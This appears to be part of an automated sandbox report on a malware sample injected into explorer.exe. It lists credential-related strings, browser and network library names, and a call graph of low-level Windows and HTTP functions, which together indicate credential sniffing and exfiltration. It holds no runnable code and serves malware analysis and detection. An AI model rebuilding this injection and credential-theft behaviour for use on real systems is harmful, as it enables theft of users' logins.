
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                  • Instruction ID: bfb14b5c858553707539f564bcdf69f238d922782b48a5c749af975af943bf3a
                                                                                                                                                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                  • Instruction Fuzzy Hash: E2918E70618B488FDB19DFA8D448BEEBBE1FF98304F40462DD48AD7252EF7095458785
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $.$e$n$v
                                                                                                                                                                  • API String ID: 0-1849617553
                                                                                                                                                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                  • Instruction ID: 2ed13d9cd1c7009a68f8b04622da91dde8d67eaf22c3964a86c2307782e7974d
                                                                                                                                                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                  • Instruction Fuzzy Hash: D2718F31618B498FD759DFA8C4886AAF7F1FF98308F00062ED44AC7261EB71E9458B81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                  • API String ID: 0-1970020201
                                                                                                                                                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                  • Instruction ID: c4439963ff5b86508ff4870ee07c55ff250a7fd38db90ce77d1474f0f3e02c06
                                                                                                                                                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                  • Instruction Fuzzy Hash: DE514AB0918B4D8FDB55DFA4C084AEEF7E1FF58304F404A2E959AE7214EF30A5418B89
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                  • Instruction ID: 70d8f0a2787c765381b591a02acd9572ed3ac21febee318d7ff57dc98e76d4cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 59418134219B498FDB65EF6498497EAB7E4FB98345F414B2E984EC7240EF30D505C782
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                  • Instruction ID: e784722bb01592ce53f1c1c78329b99e376f4709576df3c351934a446b9b226c
                                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                  • Instruction Fuzzy Hash: C2417135A19F1D8FCF44EF9880987ADB7E1FB58345F41456AA80ED7200EA71D541CBC2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                  • Instruction ID: 6ef0537867ecfccb04cc8d3b7bad3ea34ba009fd5249621974280c514b650b55
                                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B415F70608B498FDBA9DF68C4883AAFBE1FB98304F504A6F949EC3255DB70D545CB81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                  • Instruction ID: 37ec07adad541cc3e68673a0b17b29454fc1a25e87ad1801a876404fb50089fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                  • Instruction Fuzzy Hash: FF31DE3151DF886FD71ADBA8C0886EABBD0FB94304F50491EE49BC7251EA31A54ACA43
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                  • Instruction ID: 6c29236269e8148d1b94f87f950c7eb26c28e69762f1650fee9362d0a5ef566f
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E31DE7151DF486FD71ADBA8C489AEAB7D4FB94304F40491EE49BC3251EA30E54ACA82
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                  • Instruction ID: a0d64d7fa7066b3317822d5e6f095fd6f4c359c3ece44980624a3337182e733c
                                                                                                                                                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                  • Instruction Fuzzy Hash: C5317C74119F0A4FCB85EF688499BAAB7E1FB98308F84062DA84ACB254DF30D5458B52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                  • Instruction ID: f0dbfda6d73e24dccecec0c7c9cbed7645c2ccf91dd55a9a16b09ee20108432f
                                                                                                                                                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A318D75119F0A8FCB85DF688498BAAF7E1FF98308F84462D984ACB254DF30D545CB52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                  • Instruction ID: 2ddc424b5c49c0be6ca5ac11f036548841cde7aca3b7f5003620891ee783594a
                                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                  • Instruction Fuzzy Hash: 8831B131615A4D8FCB46EFA8C8887EDBBE1FB58218F40422AD85ED7240EE749645C789
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                  • Instruction ID: 796ddfd6bc8bec6aef0a61188229213e78d8adb8b521ddfa1a2bb3e65a308100
                                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                  • Instruction Fuzzy Hash: EF219371615E4D8ECB06EFE8C8887EDBBE1FF58208F40421AD45AD7240EE749645CB89
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                  • Instruction ID: d4d7e870cb54c15aa70e4190a7cc83090921c43b026fd722092f547a08fe78a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                  • Instruction Fuzzy Hash: A4214874A25E0E9FDB08EFA8D0487EDFAF1FB58308F50462ED409E3640DB75A5918B84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                  • Instruction ID: 705ade0060a5868422aae418ef3e6cafceab8f8ca8a7a02ccc3529a4b576f9b4
                                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                  • Instruction Fuzzy Hash: CF216B74A25E0E9FDB04EFA8C0487EDFAF1FB58308F50462ED409D3600DB75A5918B84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                  • Instruction ID: 854d7313cb7028db504c37a2bc7f7ae7c9f5c1714749d4bf6058bc1d2e719af2
                                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E21C330618B0E4BCB06CF9D98846DEBBE1EF88348F015619D80ADB244D7B0E914CBC2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:1.8%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:1.9%
                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                  Total number of Nodes:635
                                                                                                                                                                  Total number of Limit Nodes:79
                                                                                                                                                                  execution_graph 98981 139070 98992 13bd30 98981->98992 98983 13918c 98984 1390ab 98984->98983 98995 12ace0 98984->98995 98986 1390e1 99000 134e40 98986->99000 98988 139110 Sleep 98989 1390fd 98988->98989 98989->98983 98989->98988 99005 138c90 98989->99005 99027 138ea0 LdrLoadDll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA 98989->99027 99028 13a530 98992->99028 98994 13bd5d 98994->98984 98997 12ad04 98995->98997 98996 12ad0b 98996->98986 98997->98996 98998 12ad40 LdrLoadDll 98997->98998 98999 12ad57 98997->98999 98998->98999 98999->98986 99001 134e4e 99000->99001 99002 134e5a 99000->99002 99001->99002 99035 1352c0 LdrLoadDll 99001->99035 99002->98989 99004 134fac 99004->98989 99006 138cb5 99005->99006 99008 138d0f 99006->99008 99036 13a970 99006->99036 99022 138e73 99008->99022 99041 13a9e0 99008->99041 99010 138d50 99010->99022 99046 13aa60 99010->99046 99012 138d7d 99013 138d97 99012->99013 99014 138d86 99012->99014 99051 13aae0 99013->99051 99056 13abc0 LdrLoadDll 99014->99056 99017 138d8d 99017->98989 99018 138e59 99059 13abc0 LdrLoadDll 99018->99059 99020 138e6c 99060 13abc0 LdrLoadDll 99020->99060 99022->98989 99024 138da6 99024->99018 99057 13ab50 LdrLoadDll 99024->99057 99025 138e26 99025->99018 99058 13ab50 LdrLoadDll 99025->99058 99027->98989 99031 13af50 99028->99031 99030 13a54c NtAllocateVirtualMemory 99030->98994 99032 13af60 99031->99032 99034 13af82 99031->99034 99033 134e40 LdrLoadDll 99032->99033 99033->99034 99034->99030 99035->99004 99061 13b000 99036->99061 99039 13a9b3 InternetOpenA 99039->99008 99040 13a9ce 99040->99008 99042 13b000 LdrLoadDll 99041->99042 99043 13aa1f 99042->99043 99044 13aa28 InternetConnectA 99043->99044 99045 13aa4f 99043->99045 99044->99010 99045->99010 99047 13aa9f 99046->99047 99048 13b000 LdrLoadDll 99046->99048 99049 13aaa8 HttpOpenRequestA 99047->99049 99050 13aacf 99047->99050 99048->99047 99049->99012 99050->99012 99052 13ab1f 99051->99052 99053 13b000 LdrLoadDll 99051->99053 99054 13ab43 99052->99054 99055 13ab28 HttpSendRequestA 99052->99055 99053->99052 99054->99024 99055->99024 99056->99017 99057->99025 99058->99025 99059->99020 99060->99022 99062 13b00c 99061->99062 99064 13a9aa 99061->99064 99063 134e40 LdrLoadDll 99062->99063 99063->99064 99064->99039 99064->99040 99065 4432ad0 LdrInitializeThunk 99068 13f12d 99071 13b9c0 99068->99071 99072 13b9e6 99071->99072 99079 129d30 99072->99079 99074 13ba16 99125 13a6a0 99074->99125 99075 13b9f2 99075->99074 99087 128f30 99075->99087 99128 129c80 99079->99128 99081 129d3d 99082 129d44 99081->99082 99140 129c20 99081->99140 99082->99075 99088 128f57 99087->99088 99541 12b1b0 99088->99541 99090 128f69 99545 12af00 99090->99545 99092 128f86 99097 128f8d 99092->99097 99616 12ae30 LdrLoadDll 99092->99616 99095 128ffc 99561 12f400 99095->99561 99121 1290f2 99097->99121 99549 12f370 99097->99549 99098 129006 99099 13bf80 2 API calls 99098->99099 99098->99121 99100 12902a 99099->99100 99101 13bf80 2 API calls 99100->99101 99102 12903b 99101->99102 99103 13bf80 2 API calls 99102->99103 99104 12904c 99103->99104 99573 12ca80 99104->99573 99106 129059 99107 134a40 8 API calls 99106->99107 99108 129066 99107->99108 99109 134a40 8 API calls 99108->99109 99110 129077 99109->99110 99111 129084 99110->99111 99112 1290a5 99110->99112 99583 12d610 99111->99583 99113 134a40 8 API calls 99112->99113 99120 1290c1 99113->99120 99116 1290e9 99118 128d00 23 API calls 99116->99118 99118->99121 99119 129092 99599 128d00 99119->99599 99120->99116 99617 12d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99120->99617 99121->99074 99126 13af50 LdrLoadDll 99125->99126 99127 13a6bf 99126->99127 99159 138bb0 99128->99159 99132 129ca6 99132->99081 99133 129c9c 99133->99132 99166 13b2a0 99133->99166 99135 129ce3 99135->99132 99177 129aa0 99135->99177 99137 129d03 99183 129620 LdrLoadDll 99137->99183 99139 129d15 99139->99081 99519 13b590 99140->99519 99143 13b590 LdrLoadDll 99144 129c4b 99143->99144 99145 13b590 LdrLoadDll 99144->99145 99146 129c61 99145->99146 99147 12f170 99146->99147 99148 12f189 99147->99148 99523 12b030 99148->99523 99150 12f19c 99527 13a1d0 99150->99527 99154 12f1c2 99157 12f1ed 99154->99157 99533 13a250 99154->99533 99156 13a480 2 API calls 99158 129d55 99156->99158 99157->99156 99158->99075 99160 138bbf 99159->99160 99161 134e40 LdrLoadDll 99160->99161 99162 129c93 99161->99162 99163 138a60 99162->99163 99184 13a5f0 99163->99184 99167 13b2b9 99166->99167 99187 134a40 99167->99187 99169 13b2d1 99170 13b2da 99169->99170 99226 13b0e0 99169->99226 99170->99135 99172 13b2ee 99172->99170 99244 139ef0 99172->99244 99497 127ea0 99177->99497 99179 129ac1 99179->99137 99180 129aba 99180->99179 99510 128160 99180->99510 99183->99139 99185 13af50 LdrLoadDll 99184->99185 99186 138a75 99185->99186 99186->99133 99188 134d75 99187->99188 99198 134a54 99187->99198 99188->99169 99191 134b63 99313 13a450 LdrLoadDll 99191->99313 99192 134b80 99255 13a350 99192->99255 99195 134ba7 99197 13bdb0 2 API calls 99195->99197 99196 134b6d 99196->99169 99200 134bb3 99197->99200 99198->99188 99252 139c40 99198->99252 99199 134d39 99202 13a480 2 API calls 99199->99202 99200->99196 99200->99199 99201 134d4f 99200->99201 99206 134c42 99200->99206 99322 134780 LdrLoadDll NtReadFile NtClose 99201->99322 99203 134d40 99202->99203 99203->99169 99205 134d62 99205->99169 99207 134ca9 99206->99207 99209 134c51 99206->99209 99207->99199 99208 134cbc 99207->99208 99315 13a2d0 99208->99315 99210 134c56 99209->99210 99211 134c6a 99209->99211 99314 134640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99210->99314 99214 134c87 99211->99214 99215 134c6f 99211->99215 99214->99203 99271 134400 99214->99271 99259 1346e0 99215->99259 99218 134c60 99218->99169 99220 134d1c 99319 13a480 99220->99319 99221 134c7d 99221->99169 99224 134c9f 99224->99169 99225 134d28 99225->99169 99227 13b0f1 99226->99227 99228 13b103 99227->99228 99229 13bd30 2 API calls 99227->99229 99228->99172 99230 13b124 99229->99230 99342 134060 99230->99342 99232 13b170 99232->99172 99233 13b147 99233->99232 99234 134060 3 API calls 99233->99234 99236 13b169 99234->99236 99236->99232 99374 135380 99236->99374 99237 13b1fa 99238 13b20a 99237->99238 99468 13aef0 LdrLoadDll 99237->99468 99384 13ad60 99238->99384 99241 13b238 99463 139eb0 99241->99463 99245 13af50 LdrLoadDll 99244->99245 99246 139f0c 99245->99246 99491 4432c0a 99246->99491 99247 139f27 99249 13bdb0 99247->99249 99494 13a660 99249->99494 99251 13b349 99251->99135 99253 13af50 LdrLoadDll 99252->99253 99254 134b34 99253->99254 99254->99191 99254->99192 99254->99196 99256 13af50 LdrLoadDll 99255->99256 99257 13a36c NtCreateFile 99256->99257 99257->99195 99260 1346fc 99259->99260 99261 13a2d0 LdrLoadDll 99260->99261 99262 13471d 99261->99262 99263 134724 99262->99263 99264 134738 99262->99264 99265 13a480 2 API calls 99263->99265 99266 13a480 2 API calls 99264->99266 99267 13472d 99265->99267 99268 134741 99266->99268 99267->99221 99323 13bfc0 99268->99323 99270 13474c 99270->99221 99272 13444b 99271->99272 99273 13447e 99271->99273 99274 13a2d0 LdrLoadDll 99272->99274 99275 1345c9 99273->99275 99279 13449a 99273->99279 99276 134466 99274->99276 99277 13a2d0 LdrLoadDll 99275->99277 99278 13a480 2 API calls 99276->99278 99283 1345e4 99277->99283 99280 13446f 99278->99280 99281 13a2d0 LdrLoadDll 99279->99281 99280->99224 99282 1344b5 99281->99282 99285 1344d1 99282->99285 99286 1344bc 99282->99286 99341 13a310 LdrLoadDll 99283->99341 99287 1344d6 99285->99287 99288 1344ec 99285->99288 99290 13a480 2 API calls 99286->99290 99291 13a480 2 API calls 99287->99291 99298 1344f1 99288->99298 99329 13bf80 99288->99329 99289 13461e 99292 13a480 2 API calls 99289->99292 99293 1344c5 99290->99293 99294 1344df 99291->99294 99295 134629 99292->99295 99293->99224 99294->99224 99295->99224 99306 134503 99298->99306 99332 13a400 99298->99332 99299 134557 99300 13456e 99299->99300 99340 13a290 LdrLoadDll 99299->99340 99302 134575 99300->99302 99303 13458a 99300->99303 99304 13a480 2 API calls 99302->99304 99305 13a480 2 API calls 99303->99305 99304->99306 99307 134593 99305->99307 99306->99224 99308 1345bf 99307->99308 99335 13bb80 99307->99335 99308->99224 99310 1345aa 99311 13bdb0 2 API calls 99310->99311 99312 1345b3 99311->99312 99312->99224 99313->99196 99314->99218 99316 13af50 LdrLoadDll 99315->99316 99317 134d04 99316->99317 99318 13a310 LdrLoadDll 99317->99318 99318->99220 99320 13a49c NtClose 99319->99320 99321 13af50 LdrLoadDll 99319->99321 99320->99225 99321->99320 99322->99205 99325 13bfda 99323->99325 99326 13a620 99323->99326 99325->99270 99327 13af50 LdrLoadDll 99326->99327 99328 13a63c RtlAllocateHeap 99327->99328 99328->99325 99330 13a620 2 API calls 99329->99330 99331 13bf98 99329->99331 99330->99331 99331->99298 99333 13a41c NtReadFile 99332->99333 99334 13af50 LdrLoadDll 99332->99334 99333->99299 99334->99333 99336 13bba4 99335->99336 99337 13bb8d 99335->99337 99336->99310 99337->99336 99338 13bf80 2 API calls 99337->99338 99339 13bbbb 99338->99339 99339->99310 99340->99300 99341->99289 99343 134071 99342->99343 99344 134079 99342->99344 99343->99233 99373 13434c 99344->99373 99469 13cf20 99344->99469 99346 1340cd 99347 13cf20 2 API calls 99346->99347 99351 1340d8 99347->99351 99348 134126 99350 13cf20 2 API calls 99348->99350 99354 13413a 99350->99354 99351->99348 99352 13d050 3 API calls 99351->99352 99483 13cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99351->99483 99352->99351 99353 134197 99355 13cf20 2 API calls 99353->99355 99354->99353 99474 13d050 99354->99474 99356 1341ad 99355->99356 99358 1341ea 99356->99358 99360 13d050 3 API calls 99356->99360 99359 13cf20 2 API calls 99358->99359 99361 1341f5 99359->99361 99360->99356 99362 13d050 3 API calls 99361->99362 99367 13422f 99361->99367 99362->99361 99365 13cf80 2 API calls 99366 13432e 99365->99366 99368 13cf80 2 API calls 99366->99368 99480 13cf80 99367->99480 99369 134338 99368->99369 99370 13cf80 2 API calls 99369->99370 99371 134342 99370->99371 99372 13cf80 2 API calls 99371->99372 99372->99373 99373->99233 99375 135391 99374->99375 99376 134a40 8 API calls 99375->99376 99378 1353a7 99376->99378 99377 1353fa 99377->99237 99378->99377 99379 1353e2 99378->99379 99380 1353f5 99378->99380 99381 13bdb0 2 API calls 99379->99381 99382 13bdb0 2 API calls 99380->99382 99383 1353e7 99381->99383 99382->99377 99383->99237 99484 13ac20 99384->99484 99387 13ac20 LdrLoadDll 99388 13ad7d 99387->99388 99389 13ac20 LdrLoadDll 99388->99389 99390 13ad86 99389->99390 99391 13ac20 LdrLoadDll 99390->99391 99392 13ad8f 99391->99392 99393 13ac20 LdrLoadDll 99392->99393 99394 13ad98 99393->99394 99395 13ac20 LdrLoadDll 99394->99395 99396 13ada1 99395->99396 99397 13ac20 LdrLoadDll 99396->99397 99398 13adad 99397->99398 99399 13ac20 LdrLoadDll 99398->99399 99400 13adb6 99399->99400 99401 13ac20 LdrLoadDll 99400->99401 99402 13adbf 99401->99402 99403 13ac20 LdrLoadDll 99402->99403 99404 13adc8 99403->99404 99405 13ac20 LdrLoadDll 99404->99405 99406 13add1 99405->99406 99407 13ac20 LdrLoadDll 99406->99407 99408 13adda 99407->99408 99409 13ac20 LdrLoadDll 99408->99409 99410 13ade6 99409->99410 99411 13ac20 LdrLoadDll 99410->99411 99412 13adef 99411->99412 99413 13ac20 LdrLoadDll 99412->99413 99414 13adf8 99413->99414 99415 13ac20 LdrLoadDll 99414->99415 99416 13ae01 99415->99416 99417 13ac20 LdrLoadDll 99416->99417 99418 13ae0a 99417->99418 99419 13ac20 LdrLoadDll 99418->99419 99420 13ae13 